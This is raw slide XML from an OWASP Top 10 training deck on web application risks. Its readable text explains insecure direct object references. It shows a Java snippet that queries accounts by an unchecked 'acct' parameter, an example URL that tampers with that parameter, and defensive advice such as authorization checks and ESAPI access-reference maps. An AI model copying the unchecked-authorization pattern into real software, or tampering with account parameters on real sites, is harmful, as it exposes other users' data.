Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html"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www.owasp.org/index.php/ASV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owasp.org/index.php/Guide_to_Cryptography" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Communications" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssldb/index.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASV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www.owasp.org/index.php/Testing_for_SSL-TL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we.mitre.org/data/definitions/601.html"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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html"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projects.webappsec.org/URL-Redirector-Abuse" TargetMode="Externa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notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data2.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microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Projects" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Code_Review_Guide" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_Guide" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/WebScarab" TargetMode="Externa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www.owasp.org/index.php/Guide" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_O2_Platform" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Orizon_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Code_Crawler"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9.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:OWASP-TopTen@lists.owasp.org"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www.owasp.org/index.php/Industry:Citations" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.or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4.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_200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www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Information-Leakage" TargetMode="Externa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hyperlink" Target="http://en.wikipedia.org/wiki/HTTP_header_injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A3" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Application_Denial_of_Service" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Insufficient+Anti-autom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owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mitre.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.whitehatsec.com/home/resource/stats.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Guide" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_CLASP_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.whitehatsec.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hyperlink" Target="http://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.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hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/"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owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Reviewing_Code_for_OS_Injection"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hyperlink" Target="http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.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wasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xss.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owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/User.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Authentication_Cheat_Sheet"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www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Guide_to_Authent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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6858000" cy="91440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52281"/>
          <a:ext cx="6858000" cy="252898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1107">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4150">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91641">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the types of users of your system. Do any users have only partial access to certain types of system data?</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who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. Is access granted?</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rPr>
                        <a:t>Applications frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws and code analysis quickly shows whether authorization is properly verified.</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can compromise all the data that can be referenced by the parameter. Unless the name space is sparse,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> it’s easy for an attacker to access all available data of that type.</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exposed data</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unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connection.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(query , … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRP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is vulnerable to insecure direct object references is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object references have appropriate defenses. To achieve this, consider:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>references to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restricted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resources, the application needs to verify the user is authorized to access the exact resource they have requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the reference is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reference, the mapping to the direct reference must be limited to values authorized for the current user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.</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Top 10-2007 on Insecure Dir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ESAPI Access Reference Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>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Access Control API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isAuthorizedForData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isAuthorizedForFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
